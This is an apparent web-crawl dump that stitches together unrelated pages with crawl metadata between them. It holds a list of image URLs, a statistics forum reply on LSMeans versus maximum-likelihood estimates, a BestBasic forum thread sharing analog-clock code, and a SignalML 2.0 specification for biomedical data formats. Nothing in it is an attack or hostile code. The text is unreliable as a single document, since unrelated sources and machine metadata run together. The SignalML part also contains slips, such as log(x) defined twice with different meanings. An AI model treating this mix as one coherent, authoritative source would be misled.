[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8917493,"math_prob":0.99875474,"size":1772,"snap":"2021-31-2021-39","text_gpt3_token_len":379,"char_repetition_ratio":0.16402715,"word_repetition_ratio":0.1736111,"special_character_ratio":0.19018058,"punctuation_ratio":0.103975534,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999912,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-31T13:16:44Z\",\"WARC-Record-ID\":\"<urn:uuid:3d79942d-c4e0-40ad-96cf-ad5e0ba75ed2>\",\"Content-Length\":\"86190\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:73eb8c77-fd5c-4c4e-91c6-2d40e3f3e2f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:3fffbbd4-5e14-4256-98fb-fcdd74a37097>\",\"WARC-IP-Address\":\"192.0.78.13\",\"WARC-Target-URI\":\"https://anhngq.wordpress.com/2010/06/05/\",\"WARC-Payload-Digest\":\"sha1:WFXTJ2Y2TWV4N5WHJLBX3RGNWAOFDRW6\",\"WARC-Block-Digest\":\"sha1:DZ6YQ4UTU5FGO6SLETMWD4Y7DDV52X2U\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154089.6_warc_CC-MAIN-20210731105716-20210731135716-00543.warc.gz\"}"}
https://forum.bebac.at/forum_entry.php?id=18503
[ "## Huge gap in my understanding [General Sta­tis­tics]\n\nDear ElMaestro,\n\nI think the statement “LSMean difference not being equal to maximum likelihood differences” and should be re-worded as “LSMean difference not being equal to maximum likelihood differences in case of unbalanced experiments”.\n\nIn other words, the use of “lsmeans” is motivated to account for unbalances in experiments as MLE estimation is condition on the data observed.\n\nConsider an experiment analyzed with a model of the form\n\nlm(y ~ treat + covariate)\n\nwhere treat is a treatment factor and covariate is an additional continuous covariate. With this model you can get estimates condition on treat and the covariate (i.e. E(Y|treat,covariate)) based on maximum likelihood estimation.\n\nHowever, we are frequently interested in estimates for E(Y|treat) which cannot be formally found by the model.\n\n- If the experiment is balanced, I expect that “lsmeans” estimates are identical to the average of the observations grouped by treat (i.e. “lsmeans” estimates are identical to MLE estimates).\n\n- If the experiment is unbalanced, a corresponding estimate for E(Y|treat) can be found via using the average of fitted values condition on the mean of the covariate across all levels of treat (i.e. “lsmeans” estimates are not identical to MLE estimates).\n\nLikely consider a simulation study\n\n1) Specify a data generating process of the form: Y ~ treat + covariate + epsilon\n2) Introduce a sampling strategy leading to an unbalanced sample data set\n3) Get estimates (MLE and “lsmeans”) from the sample data and compare it with the true value for E(Y|treat).\n\nI would expect that the “lsmeans” estimate is closer to the true value (i.e. population value for E(Y|treat)) than model estimates obtained by maximum likelihood estimates. You can to this exercise also for a balanced experiment which should give identical estimates via “lsmeans” and MLE.\n\nBest regards & hope this helps\n\nMartin\n\nPS.: We can discuss this also offline where Mr. Schütz has my contact information", null, "", null, "Ing. Helmut Schütz", null, "" ]
[ null, "https://static.bebac.at/pics/animated-ukraine-flag.gif", null, "https://static.bebac.at/img/bebac.svg", null, "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAAPBAMAAADNDVhEAAAAMFBMVEX////kUCbvZSrpWyvqe1j48vHr6+voa0fwwrPph2v149zylW/up5LytaTsmYD01cq9FiK0AAAAAXRSTlMAQObYZgAAAH1JREFUCJljMBQEgQKGQkFBIyVlBwbHypm7dztPYJh4LC009PEDhofPnszeXXyA4eA0R6D8BYaLbkBxxwaGxoqOjqWKHxg+yjkatSouYFgodtHol2IAQ6BUVmu8IgMDo8j5+CPqDAzMIHPNGRh4CgWNBWsZGBi4rlheZWAAANuzJqFyju9TAAAAAElFTkSuQmCC", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8781176,"math_prob":0.9760986,"size":4631,"snap":"2023-14-2023-23","text_gpt3_token_len":1106,"char_repetition_ratio":0.13097039,"word_repetition_ratio":0.91471803,"special_character_ratio":0.23796156,"punctuation_ratio":0.081947744,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97106546,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-04-01T03:54:51Z\",\"WARC-Record-ID\":\"<urn:uuid:ec04abb5-d015-481b-ae68-a83d65ef87f9>\",\"Content-Length\":\"14762\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f557df42-946c-428a-8b1b-ce116ee0454f>\",\"WARC-Concurrent-To\":\"<urn:uuid:2fa8019f-58a4-443e-a519-7c9b36c9b789>\",\"WARC-IP-Address\":\"172.67.142.160\",\"WARC-Target-URI\":\"https://forum.bebac.at/forum_entry.php?id=18503\",\"WARC-Payload-Digest\":\"sha1:5IKAZPNEFR34E2G4SL44ZQ6H54YSPLPE\",\"WARC-Block-Digest\":\"sha1:C7ERLMXW4NDFWDKTCA3DX2CX7ZGHBGNB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949701.0_warc_CC-MAIN-20230401032604-20230401062604-00674.warc.gz\"}"}
https://bestbasic.net/forum/viewtopic.php?f=4&t=34&sid=1a24b75095636cc9936bb746124dc49e
[ "## Simple clock\n\nFor finished programs\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Simple clock\n\nA version of a simple clock in BestBasic...\n\nCode: Select all\n\n``````' Clock\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n\n' define some constants\nscr size 600,600 \t' def size of graphic screen\nxm ym = 300,300\t\t' center of screen\nr0 r1 r2 = 250,220,170\t' radius: clock, large finger, small finger\nm1 = -1 ' reminder for minutes\ndraw manual\ndraw size 15\n\ndo\t'run clock\nh m s = now|3\nif m <> m1\nm1 = m\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\nredo\n\nprint_clock_face\n' minutes dots\nfor i=0 to 60\nw = i*6 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,5\nnext i\n' hours dots\nfor i=0 to 12\nw = i*30 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,10\nnext i\n' central dot\ndraw fcirc xm,ym,20\nreturn\n\ndraw_fingers\n' hours\nw = ((h+m/60)*30) * PI/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = (m*6) * PI/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\nreturn\n\n``````\n\nkibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nCute and stylish clock!\n\nCurrently this program consumes 100% of CPU. I will add a function to minimize CPU consumption in such 'slow' applications.\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nThat would be nice.\nBestBasic is a really nice interpreter.\nIt remembers me of working with a WANG 2200 at about 1975!\nhttps://en.wikipedia.org/wiki/Wang_2200\n\nRegards\n\nUdo\n\nkibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nThank you for your comment!", null, "kibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nOk, this function is called CPU RELAX. It can be used like this:\n\nCode: Select all\n\n``````...\nendif\ncpu relax\ngoto run_clock\n...``````\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nAnd it works...\n\nCode: Select all\n\n``````do\t'run clock\nh m s = now|3\nif m <> m1\nm1 = m\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\ncpu relax\nredo\n``````\n\nDutchman\nPosts: 151\nJoined: Tue Aug 06, 2019 4:47 pm\nLocation: Netherlands\n\n### Re: Simple clock\n\nWith seconds, showing more activity:\n\nCode: Select all\n\n``````' Clock\n' U. 
Rabe, 2019\n' Done with BestBasic\n' It's public domain\n' seconds added by Ton Nillesen\n\n' define some constants\nscr size 600,600 \t' def size of graphic screen\nxm ym = 300,300\t\t' center of screen\nr0 r1 r2 = 250,220,170\t' radius: clock, large finger, small finger\nm1 = -1 ' reminder for minutes\ndraw manual\ndraw size 15\n\ndo\t'run clock\nh m s = now|3\nif s <> s1\ns1 = s\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\n'CPU RELAX ' not in versio 1.2\nredo\n\nprint_clock_face\n' minutes dots\nfor i=0 to 60\nw = i*6 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,5\nnext i\n' hours dots\nfor i=0 to 12\nw = i*30 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,10\nnext i\n' central dot\ndraw fcirc xm,ym,20\nreturn\n\ndraw_fingers\n' hours\nw = ((h+m/60)*30) * PI/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = (m*6) * PI/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' seconds\nDRAW COLOR 1,0,0\nDRAW SIZE 4\nw = (s*6) * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw line xm-x/8,ym+y/8,xm+x,ym-y\nDRAW FCIRC xm,ym,8\nDRAW COLOR 0,0,0\nDRAW SIZE 15\nreturn\n``````\n.", null, "with seconds.JPG (22.35 KiB) Viewed 2704 times\nIt is still a long way to go\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nNice! Thank You!\n\nkibernetik\nSite Admin\nPosts: 147\nJoined: Tue Aug 06, 2019 3:03 pm\n\n### Re: Simple clock\n\nSmooth minute hand movement, minor adjustments.\n\nCode: Select all\n\n``````' Clock\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n' seconds added by Ton Nillesen\n\n' define some constants\nscr size 600,600 ' def size of graphic screen\nxm ym = 300,300 ' center of screen\nr0 r1 r2 = 250,220,170 ' radius: clock, large finger, small finger\nd1 d2 = 5,10 ' radius: minute dots, hour dots\ndraw manual\n\ndo\t'run clock\nh m s = now|3\nif s<>s1\ns1 = s\ndraw clear 1,1,1\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\ncpu relax\nredo\n\nprint_clock_face\ndraw color 0,0,0\n' hours dots\nfor i=1 to 12\nw = i*30 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,d2\nnext i\n' minutes dots\nfor i=1 to 60\nw = i*6 * PI/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc ym+x,ym+y,d1\nnext i\n' central dot\ndraw fcirc xm,ym,20\nreturn\n\ndraw_fingers\ndraw color 0,0,0\ndraw size 15\n' hours\nw = ((h+m/60)*30) * PI/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = (m*6+s/10) * PI/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' seconds\ndraw color 1,0,0\ndraw size 4\nw = (s*6) * PI/180\nx = (r0-d2*2) * sin(w)\ny = (r0-d2*2) * cos(w)\ndraw line xm-x/8,ym+y/8,xm+x,ym-y\n' central seconds dot\ndraw fcirc xm,ym,8\nreturn\n``````", null, "Без названия.jpg (34.09 KiB) Viewed 2698 times\n\nudo\nPosts: 6\nJoined: Mon Sep 30, 2019 8:55 am\n\n### Re: Simple clock\n\nThis is version 2 with changes...\n\nCode: Select all\n\n``````' Clock\n' version 2.0\n' U. Rabe, 2019\n' Done with BestBasic\n' It's public domain\n' seconds added by Ton Nillesen\n' adde some proposals by kibernetik\n' some optical changes, U. 
Rabe\n\n' define some constants\nscr size 600,600 \t' def size of graphic screen\nxm ym = 300,300\t\t' center of screen\nr0 r1 r2 = 250,220,170\t' radius: clock, large finger, small finger\nd1 d2 = 5,10 \t' diameter face dots\ns1 = -1 ' reminder for seconds\ndraw manual\n\ndo\t'run clock\nh m s = now|3\nif s <> s1\ns1 = s\ndraw clear 0.9,0.9,0.9\ngosub print_clock_face\ngosub draw_fingers\ndraw update\nendif\ncpu relax\nredo\n\nprint_clock_face\ndraw size 1\ndraw color 0.6,0.6,0.6\n' minutes dots\nfor i=0 to 60\nw = i*6 * pi/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc xm+x,ym+y,d1\nnext i\ndraw color 0.3,0.3,0.3\n' hours dots\nfor i=0 to 12\nw = i*30 * pi/180\nx = r0 * sin(w)\ny = r0 * cos(w)\ndraw fcirc xm+x,ym+y,d2\nnext i\nreturn\n\ndraw_fingers\ndraw color 0,0,0\n' central dot\ndraw fcirc xm,ym,20\ndraw size 12\n' hours\nw = ((h+m/60)*30) * pi/180\nx = r2 * sin(w)\ny = r2 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' minutes\nw = ((m+s/60)*6) * pi/180\nx = r1 * sin(w)\ny = r1 * cos(w)\ndraw line xm,ym,xm+x,ym-y\n' seconds\ndraw size 4\nw = (s*6) * pi/180\nx = (r0-d2*2) * sin(w)\ny = (r0-d2*2) * cos(w)\ndraw color 1,0,0\ndraw line xm-x/8,ym+y/8,xm+x,ym-y\ndraw fcirc xm,ym,8\nreturn\n``````", null, "clock.png (33.54 KiB) Viewed 2690 times" ]
[ null, "https://bestbasic.net/forum/images/smilies/icon_e_smile.gif", null, "https://bestbasic.net/forum/download/file.php", null, "https://bestbasic.net/forum/download/file.php", null, "https://bestbasic.net/forum/download/file.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.53621703,"math_prob":0.98216414,"size":913,"snap":"2021-21-2021-25","text_gpt3_token_len":374,"char_repetition_ratio":0.122112215,"word_repetition_ratio":0.11702128,"special_character_ratio":0.42606792,"punctuation_ratio":0.10300429,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9909289,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-23T02:16:55Z\",\"WARC-Record-ID\":\"<urn:uuid:50ff6a8e-8433-4d26-ab70-b5cd56973949>\",\"Content-Length\":\"51344\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47c48d90-585f-452b-b73d-3e6bf0cafcf6>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb0c9326-cceb-4bf2-b451-1ef97c83d95d>\",\"WARC-IP-Address\":\"5.181.255.166\",\"WARC-Target-URI\":\"https://bestbasic.net/forum/viewtopic.php?f=4&t=34&sid=1a24b75095636cc9936bb746124dc49e\",\"WARC-Payload-Digest\":\"sha1:LUXOAQUX4ERHXHJWXUOVHOESLIQKQ5BN\",\"WARC-Block-Digest\":\"sha1:CMXONVW46HHIT6SPEVWIOLAXQPJHSBQS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488528979.69_warc_CC-MAIN-20210623011557-20210623041557-00108.warc.gz\"}"}
https://braintech.pl/software/svarog/signalml/?lang=en
[ "## Preamble\n\n• SignalML describes formats used for digital storage of (multivariate) biomedical time series.\n• SignalML is not a data format. Using SignalML description, data is read from the original files, without any conversion or file multiplication.\n• We can assume that SignalML does not have to provide a complete description of all the information contained in the data files, but it should describe its subset necessary and sufficient for a proper interpretation of the time series (e.g. display).\n• As one of the extensions from version 1.0, we allow the possibility of storing information about one recording in more than one file.\n\n## Describing data series\n\nThe content of data files can be divided into two logical parts\n\n1. The header containing meta-data—a description of the data contained in the file (sampling frequency, number of channels, electrode names, conversion constants, … and especially the format or physical layout of samples).\n2. The data part (raw numbers).\n\nInformation that is normally contained in a header, either at the begging of the single file, or in some file separate from the main data file, and is required to understand the bulk of data, is converted into a series of ‘parameters’. The recipe to find this information is given using `param` tags.\n\n`param` tags must be children of a `file` tag. In case of parameters to be read from a file, this implicitly specifies the file.\n\nParameters come in a few flavours:\n\n• either taking arguments (functions) or not (variables)\n• either evaluating an expression or reading data from a file\n\nIrrespective of the specific requirements described below for different flavours of parameters, for each parameter the following must be given:\n\n• name (the `id` attibute)\nThis must be a valid identifier as specified in #Identifiers. Identifiers of all parameters must be unique in one format description.\n• type (the `type` attibute)\nOne of the types defined in Variable types.\n\nThe parameters are constant and idempotent, i.e. their evaluation always returns the same value (for the same arguments, in case of functions), and subsequent evaluation has no side effects.\n\nAn evaluation of a parameter can require other parameters because of references from attributes and expressions. A directed graph of such requirements must not contain cycles. In other words, an application using a format description can start with any parameter and find its value evaluating other parameters as needed.\n\n#### Variables\n\nVariables are parameters which have a constant value— it can only depend on other parameters (which are constant) and data read from files, which are constant too.\n\nA parameter is a variable when it has no arguments defined.\n\n#### Functions\n\nFunctions are parameters which require arguments for evaluation. Their value is constant for each combination of arguments. In evaluating the function, arguments behave like local parameters with the value passed in the function call.\n\nA parameter is a function when it has at least one argument defined.\n\nAn argument is specified with a name and a type. Arguments are specified as child `tag` nodes of the `param` node defining the function. Each `arg` must have the following attributes:\n\n• `name`\n• `type`\n\nArgument names must be unique within the function and they must be valid identifiers.\n\nWhen the value of the parameter should be read from a file, child tags specify how to read this value must be given. 
What attributes are necessary depends on the type of file and is described in The data part.\n\nThis type of parameters cannot contain the `expr` child.\n\n#### Evaluating parameters\n\nParameters whose value is to be calculated from other parameters, (or is a numerical constant), can specify one of the following. Either it can have the child `<expr>` node, whose contents are then evaluated according to the rules in Expressions.\n\n#### Standard parameters\n\nParameters listed below have a specified meaning. Some parameters are prerequisite for understanding/interpretation of the (multivariate) time series data. When there is no default value that can be assumed to be usually right, then they are required to be present in each format description. They can be evaluating or not.\n\nIt is preferable to describe the information present in each format as completely as possible, but this might not be feasible, and is not required for basic interpretation. Therefore, we define a minimum set of parameters:\n\nnumber_of_channels [required]\nThe width of each sample, that is, number of time series (channels, derivations) recorded simultaneously.\nType: int\nmapping(channel, sample) [required]\nThe mapping specifying the layout of data. See #Mapping Mapping.\nType: int\nsampling_frequency(channel) [optional]\nThe sampling frequency of the given channel.\nType: float\nUnits required\ncalibration_gain(channel) [optional]\nConstant by which numbers from file are multiplied to get a physical value.\nType: float\nDefault value: 1\nSee #Calculating sample value.\ncalibration_offset(channel) [optional]\nConstant by which numbers from file are diminished to get a physical value.\nType: float\nDefault value: 0\nSee #Calculating sample value.\ncalibration_units(channel) [optional]\nPhysical units which this channel uses (usually μV or fT).\nType: string\nThis string is understood as described in #Parsing units.\nsamples_in_file(channel) [optional]\nThe length of the time series in samples, for the given channel. In case of most formats, the result does not depend on the channel number, and the function argument can be ignored. EDF is one of the rare formats where each channel can have a different number of samples, and the function argument is necessary.\nIf this parameter is not defined, the only way to know the number of samples is from file size.\nType: int\nchannel_name(channel) [optional]\nName of each channel.\nType: string\nDefault value: Lchannel where channel is substituted with the function argument.\n\n#### Calculating sample value\n\nSamples are often stored after a linear transformation. Therefore, two standard parameters are specified, which are then used to calculate the real value of a sample.\n\n``````\nfinal_value(channel, sample) =\n(sample_as_stored_in_file(channel,sample) - calibration_offset(channel))\n* calibration_gain(channel)\n```\n```\n\nNeither of the two parameters must be defined. They have default values 0 and 1, which means that the above formula defaults to\n\n``````\nfinal_value(channel, sample) = sample_as_stored_in_file(channel,sample)\n```\n```\n\n### The data part\n\n#### File types\n\nSignalML 2.0 can describe formats where data is stored in files of one of the following types:\n\n• Fixed position\n• XML\n• Free text\n##### Fixed-position files\n\nFiles based on fields whose width is defined a priori, so that some field can be located by seek()ing on the file and read()ing from a known location, are called in this document fixed-position files. 
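As a rough illustration only (not part of the specification), the seek-and-read access pattern for such fixed-position fields might look like the Python sketch below; the file name, offset and format string are placeholders, not values taken from any real format.

```
# Sketch: fetch one fixed-position header field from a "binary" file.
# The offset (16) and format ('>h', big-endian int16) are hypothetical.
import struct

def read_fixed_field(path, offset, fmt):
    """Seek to a known byte offset and decode a fixed-width field."""
    with open(path, "rb") as f:
        f.seek(offset)
        raw = f.read(struct.calcsize(fmt))
        return struct.unpack(fmt, raw)[0]

# number_of_channels = read_fixed_field("recording.bin", 16, ">h")
```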
They are also commonly called ‘binary’ files, but this is imprecise: e.g. EDF contains constant-width, fixed-position data formatted as ASCII strings, therefore not binary.\n\nTo retrieve a field present in a file of this type, the following data is necessary:\n\ninput format\nThis describes how the data is stored in the file, or more precisely, how many bytes are used, and how they should be interpreted.\nThis description is understood using the rules of a dtype definition, as defined in the NumPy array interface.\noutput type\nWhatever is read, is converted to this type. It must be one of the types defined in #variable_types.\nIf output type is not specified, it defaults to the same generic type as the input format, albeit without explicit width for int and float types.\nposition in file\nThis tells where in the file this variable is located. It is the offset from the begging of file in bytes.\n\nThis file type is specified by `<file type='binary'>`.\n\n##### XML files\n\nXML files are used more often for headers rather than data, but it is certainly possible to use XML for storage of both data parts. No validation is performed.\n\nTo retrieve a variable in an XML file the following information is necessary:\n\noutput type\nThe same as in fixed-offset files.\nlocation specified as an XPath\nThis xpath is used to retrieve some string-value, which is in turn interpreted as a text representation of the output type.\n\nThis file type is specified by `<file type='XML'>`.\n\n##### Text files\n\nText files are composed of ‘lines’ separated by end-of-line markers, which in turn are divided into ‘fields’, and the position of n-th sample can only be found by sequential parsing.\n\nBecause there are many, many different formats of text files, we do not define the precise format. Instead, the file is split into lines using the end-of-line marker, defined as a regular expression.\n\nEach line can be split into fields, using a seperator regexp, defined as the attribute `split` on the file.\n\nTo retrieve a variable one of the following must be used:\n\n###### Line number and field number\n``````\n<file split=\"/ +/\"> (split at whitespace)\n(extract third field on the first line)\n<param id=\"number_of_channels\" line=\"1\" field=\"3\" />\n```\n```\n###### Line number and a regexp to extract the variable value\n\nThe regexp must be written in such a way, that the one and only capturing group matches the value.\n\n``````\n(a string after the first colon in the first line)\n<param id=\"number_of_channels\" line=\"1\" match=\"/^[^:]*:(.+)\\$/\" />\n```\n```\n###### A regexp that matches against the whole file\n\nThe regexp must be written in such a way, that the one and only capturing group matches the value.\n\n``````\n(a line that starts with MSI.TotalChannels, part after colon)\n<param id=\"number_of_channels\" line=\"any\"\nmatch=\"/^MSI.TotalChannels:\\s*(\\d+)\\s*\\$/\" />\n```\n```\n\nThis file type is specified by `<file type='text'>`.\n\n#### Data tag and offset and file mapping\n\nThe presence of data in a file is signified by a `<data>` tag. There must be no more than one tag of this kind, but no data can be extracted from a format unless there is at least one. The file in which the data is contained can be specified either explicitly or implicitly.\n\nIf the element contains an attribute `file`, then this must be a name of a parameter giving the ID of file to use. IDs of files are specified through the `id` attribute. 
If follows, that if the attribute was not used for a file, it cannot be explicitly referenced in this way.\n\nIf the `file` attribute of the `<data>` element is not used, the `<data>` element must be nested inside a `<file>` element. The enclosing file is then implicitly taken to be the file containing the data.\n\nThe layout of data is specified through a function given through the `offset` attribute. The function must return the position (offset in bytes from the begging of file) of the requested measurement.\n\nFor example, for file called `test.dat` with multiplexed data, one could write\n\n``` <file name='test.dat'>\n<data offset='multiplex_mapping'>\n<param 'multiplex_mapping'> … </param>\n</file>\n```\n\nThe parameter specified through the `file` and `offset` attributes must be functions taking two `int` arguments, specifying sample and channel number, starting from 0.\n\n##### Example: multiplexed\n\nMultiplexed samples are arranged as\n(sample0:channel0 sample0:channel1 …\nsample1:channel0 sample1:chanenl1 …\nsampleN:channel0 sampleN:channel1 … sampleN:channelM)\n\nThe relevant mapping function is\n\n```<param id='mapping' type='int'>\n<arg name='channel' type='int'> (channel number)\n<arg name='sample' type='int'> (sample number)\n<expr>\n(sample * number_of_channels + channel) * datatype_width + header_size\n</expr>\n</param>\n```\n##### Example: EDF\n\nSamples are aranged in frames. To understand the layout, a helper parameter is used, `channel_offset(channel)`, which specifies how far into each frame this channels data is stored. Another helper parameter used, `frame_size` specifies the size of each frame in bytes.\n\nThe relevant mapping function is\n\n``` <param id='mapping' type='int'>\n<arg type='int' name='channel' />\n<arg type='int' name='sample' />\n<expr>\nsample//samples_per_frame(channel) * frame_size +\nchannel_offset(channel) +\nsample%samples_per_frame(channel) * datatype_width\n</expr>\n</param>\n<param id='channel_offset' type='int'>\n<arg type='int' name='channel' />\n<expr>\nchannel == 0 ? 0 :\nchannel_offset(channel-1) + samples_per_frame(channel-1) * datatype_width\n</expr>\n</param>\n<param id='frame_size' type='int'>\n<expr>channel_offset(number_of_channels + 1)</expr>\n</param>\n```\n\n#### Accessing files\n\nFiles are referenced through `<file>` elements.\n\nSometimes the file name is empty, i.e. an `str` with length 0, or simply not specified (in case of files defined through `<file>` elements). The application can cope with this situation in two ways:\n\n1. If it is the ‘main’ file, then the standard sequence of events is such, that the user specifies some filename to open, and this filename is used for the ‘main’ file.\n2. If the filename wasn’t specified, the user can be queried or an error can be signaled.\n\n## Standard functions\n\nThe following functions are defined by the specification and are available in all SignalML implementations.\n\n#### Exponential functions\n\n`log(x)` returns logex\n`log(x)` returns log10x\n`exp(x)` returns ex\n`factorial(x)` returns x!\n\n#### Trigonometric functions\n\nThe argument is interpreted as an angle in radians.\n\n`sin(x)` returns sinx\n`cos(x)` returns cosx\n`tan(x)` returns tanx\n`cot(x)` returns cotx\n\n#### String functions\n\n`strip(s)` returns the string with whitespace removed from the begging and end. 
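Stepping back to the layout examples above for a moment: the multiplexed mapping translates directly into a small Python helper. This is only a sketch of the arithmetic, not specification text, and the argument names are illustrative.

```
# Byte offset of (channel, sample) for the multiplexed layout described above:
# sample0:ch0 sample0:ch1 ... sample1:ch0 sample1:ch1 ...
def multiplex_offset(channel, sample, number_of_channels,
                     datatype_width, header_size=0):
    return (sample * number_of_channels + channel) * datatype_width + header_size

# Example: channel 2, sample 99, 19 channels of 2-byte samples, 512-byte header.
print(multiplex_offset(2, 99, 19, 2, 512))  # (99*19 + 2)*2 + 512 = 4278
```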
To be considered whitespace, characters must be defined so in Unicode.\n\n`split(s, sep)` returns an list of words in the string `s`, using `sep` as seperator.\n\n#### Special functions\n\n`protocol_version` gives the SignalML version?\n\n`throw(message)` is used to return an error to the application. The `message` is a string intended to be understood by the user that describes the error.\n\n## Variable types\n\nVariable types are used for output from the codec to the surrounding application.\n\nThe following types are defined:\n\n int a signed integral number float a floating-point number bool a boolean variable str an array of Unicode characters bytes an array of one-byte characters\n\nThese types are based on Python. However, they are not required to have unlimited range. It is at implementations discretion to use native integer or float types of sufficient range.\n\nAdditionally, arrays can be defined as int[], float[], etc. The length of the array is not defined at the time of declaration.\n\nThose types are defined to describe how the application communicates with the codec at the logical level. However, the implementation defines what native types are used, and e.g. the data declared as float can be really present in memory as float, but the sampling frequency, also declared as float, can be stored in memory as a double float.\n\n## Expressions\n\nExpressions are used in a number of places:\n\n1. In evaluating parameters — value of the parameter is found by executing the expression contained in an `<expr>` node.\n2. Some attributes are interpreted as expressions and executed.\n\nThe interpretation of an expression is roughly based on Python syntax and evaluation rules, including precedence.\n\nExpressions can contain parameter references — variable references and function calls. A name used in an expression, will, in order or precedence,\n\n1. refer to a local argument name (in a function),\n2. refer to a parameter,\n3. refer to a built-in parameter,\n4. cause a failure.\n\n#### variable references\n\n````some_name`\n```\n\n#### function calls\n\n````some_func(param1, param2)`\n```\n\n#### constants\n\n• integral numbers (e.g. `123`)\n• floating-point numbers (e.g. `23.12`)\n• numbers with an explicit radix (e.g. `0x200`, `0o755`, `0b00110011`)\n\n#### operators\n\n• `+` (addition), `-`(subtraction), `*`(multiplication)\n• `/` (division) and `//` integral division\n• `%` (modulo)\n• `==`, `<`, `<=`, `>=`, `>`, `!=` (comparisons)\n• `&` (bitwise and), `|` (bitwise or), `^` (bitwise exclusive or), `<<` (bitwise left shift), `>>` (bitwise right shift)\n• `[start:stop:stride]` (slicing)\n• `predicate?if-true:if-false` (ternary operator)\n• `and`, `or`, `not`, `xor` (logical operators)\n\n#### identifiers\n\nParameter references and function calls are performed through identifiers. 
